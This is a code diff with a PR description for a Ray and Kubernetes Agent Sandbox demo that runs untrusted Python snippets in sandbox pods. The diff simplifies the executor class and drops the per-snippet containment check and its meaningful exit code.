-            stderr = "..." + stderr[-300:]
-        print(f"  stderr: {stderr}")
-    if result.get("error"):
-        print(f"  error: {result['error']}")
-
 
 @ray.remote(num_cpus=0)
 class SandboxExecutor:
-    """A trusted Ray actor that owns one sandbox claimed from the WarmPool.
-
-    Each instance:
-      - claims one sandbox at __init__ (sub-200ms thanks to the WarmPool;
-        without it, this would take 30s+ for image pull + gVisor boot)
-      - exposes execute() which writes the snippet to the sandbox and
-        runs it under a short timeout
-      - deletes the sandbox at cleanup() (the pool controller has
-        already provisioned a fresh sandbox to backfill the slot;
-        sandboxes are never returned to the pool, only replaced)
-    """
+    """A Ray actor that claims and manages a single sandbox."""
 
     def __init__(self, worker_id: int):
         from k8s_agent_sandbox import SandboxClient
@@ -206,10 +33,6 @@ class SandboxExecutor:
 
         self.worker_id = worker_id
 
-        # use_pod_ip=True bypasses the cluster Service and routes the
-        # SDK's HTTP traffic straight to the sandbox pod IP. This is the
-        # "Decoupled Direct Proxy" model - useful in distributed Ray
-        # workloads where every avoided hop matters.
         self.client = SandboxClient(
             connection_config=SandboxInClusterConnectionConfig(
                 use_pod_ip=True,
@@ -223,125 +46,75 @@ class SandboxExecutor:
             template="python-runtime-sandbox",
             warmpool="python-runtime-pool",
         )
-        claim_latency = time.time() - t_claim
-        print(
-            f"[executor-{worker_id}] adopted sandbox "
-            f"'{self.sandbox.claim_name}' in {claim_latency:.3f}s"
-        )
+        print(f"[executor-{worker_id}] claimed sandbox '{self.sandbox.claim_name}' in {time.time() - t_claim:.3f}s")
 
     def execute(self, name: str, code: str, timeout: int = 5) -> dict:
-        """Write the snippet to the sandbox and run it.
-
-        Always returns a result dict; never raises - the caller iterates
-        over results uniformly regardless of per-snippet outcome.
-        """
+        """Write the code to the sandbox and run it."""
         try:
-            # `name` already includes the .py extension (see SAFE_SNIPPETS
-            # / DANGEROUS_SNIPPETS) — the snippet's identifier IS the
-            # filename written to the sandbox, so no further munging here.
             self.sandbox.files.write(name, code)
             t0 = time.time()
             res = self.sandbox.commands.run(f"python {name}", timeout=timeout)
-            duration = time.time() - t0
+            
             return {
                 "name": name,
                 "exit_code": res.exit_code,
                 "stdout": res.stdout,
                 "stderr": res.stderr,
-                "duration": duration,
+                "duration": time.time() - t0,
             }
         except Exception as e:
             return {
                 "name": name,
                 "exit_code": None,
-                "error": f"{type(e).__name__}: {e}",
+                "error": str(e),
             }
 
     def cleanup(self):
+        """Release the sandbox back to be deleted/replaced."""
         self.client.delete_sandbox(self.sandbox.claim_name)
 
 
 def main() -> int:
-    """Run the demo and return a process exit code.
-
-    Returns 0 only when every snippet hit its expected outcome; non-zero
-    otherwise. Returning a real exit code lets the wrapping RayJob's
-    status reflect containment failures - a Succeeded RayJob would
-    otherwise mask cases where dangerous snippets weren't actually
-    contained.
-    """
     ray.init()
-
-    NUM_EXECUTORS = 3
-    pass_count = 0
-    total_snippets = 0
+    
+    NUM_EXECUTORS = 2
     executors = []
 
     try:
-        print(
-            f"\nSpinning up {NUM_EXECUTORS} SandboxExecutor actors, each claiming "
-            f"one sandbox from the 'ray-native-pool' WarmPool..."
-        )
+        print(f"Starting {NUM_EXECUTORS} SandboxExecutors...")
         executors = [SandboxExecutor.remote(worker_id=i) for i in range(NUM_EXECUTORS)]
 
-        # Combine safe + dangerous, label each so we can verify outcomes.
-        all_snippets = [
-            (name, code, "safe") for name, code in SAFE_SNIPPETS
-        ] + [
-            (name, code, "dangerous") for name, code in DANGEROUS_SNIPPETS
-        ]
-        total_snippets = len(all_snippets)
-
-        print(
-            f"\nDispatching {total_snippets} snippets across {NUM_EXECUTORS} "
-            f"sandbox executors (Ray fans them out in parallel)..."
-        )
-
-        # Round-robin snippets across executors. Ray schedules them concurrently.
+        print(f"Dispatching {len(CODE_SNIPPETS)} code executors...")
+        
         futures = [
             executors[i % NUM_EXECUTORS].execute.remote(name, code)
-            for i, (name, code, _expected) in enumerate(all_snippets)
+            for i, (name, code) in enumerate(CODE_SNIPPETS)
         ]
+        
         results = ray.get(futures)
 
-        print("\n" + "=" * 60)
-        print("Execution Results")
-        print("=" * 60)
+        print("\n--- Execution Results ---")
+        for result in results:
+            print(f"\n[{result['name']}] (Exit Code: {result.get('exit_code')})")
+            if result.get("stdout"):
+                print(f"  Stdout: {result['stdout'].strip()}")
+            if result.get("stderr"):
+                print(f"  Stderr: {result['stderr'].strip()}")
+            if result.get("error"):
+                print(f"  Error:  {result['error']}")
 
-        for (name, _code, expected), result in zip(all_snippets, results):
-            contained = is_contained(name, expected, result)
-            if contained:
-                pass_count += 1
-            _print_verdict(name, expected, result, contained)
-
-        print("\n" + "=" * 60)
-        print(f"Summary: {pass_count}/{total_snippets} snippets behaved as expected")
-        print("=" * 60)
     finally:
-        # ALWAYS release claimed sandboxes, even if dispatch or result
-        # handling raised. Without this, a mid-run exception would leave
-        # NUM_EXECUTORS sandbox claims hanging in the WarmPool until manual
-        # cleanup. Cleanup errors are surfaced but never re-raise (we don't
-        # want to mask the original exception, if any).
         if executors:
-            print(
-                "\nDeleting sandbox claims "
-                "(the pool controller will keep the pool replenished)..."
-            )
+            print("\nCleaning up sandboxes...")
             try:
                 ray.get([e.cleanup.remote() for e in executors])
-            except Exception as cleanup_err:
-                print(
-                    f"WARNING: sandbox cleanup encountered errors: {cleanup_err}",
-                    file=sys.stderr,
-                )
+            except Exception as e:
+                print(f"Cleanup error: {e}", file=sys.stderr)
+        
         ray.shutdown()
-        print("\nDone.")
+        print("Done.")
 
-    # Non-zero exit when any snippet missed its expected outcome - the
-    # wrapping RayJob will surface as Failed so automation/operators get
-    # a true signal rather than a false green.
-    return 0 if pass_count == total_snippets and total_snippets > 0 else 1
+    return 0
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Why are these changes needed?

This PR contains the artifacts for https://github.com/ray-project/ray/pull/64047 walks users through deploying [Agent Sandbox](https://github.com/kubernetes-sigs/agent-sandbox) alongside KubeRay on GKE to safely execute untrusted Python code generated at runtime (LLM-generated rollout code in RL post-training, tool-use agents, code-interpreter backends, etc.).


## Related issue number

<!-- For example: "Closes #1234" -->

## Checks

- [x ] I've made sure the tests are passing.
- Testing Strategy
  - [ x] Unit tests
  - [ x] Manual tests
  - [ ] This PR is not tested :(
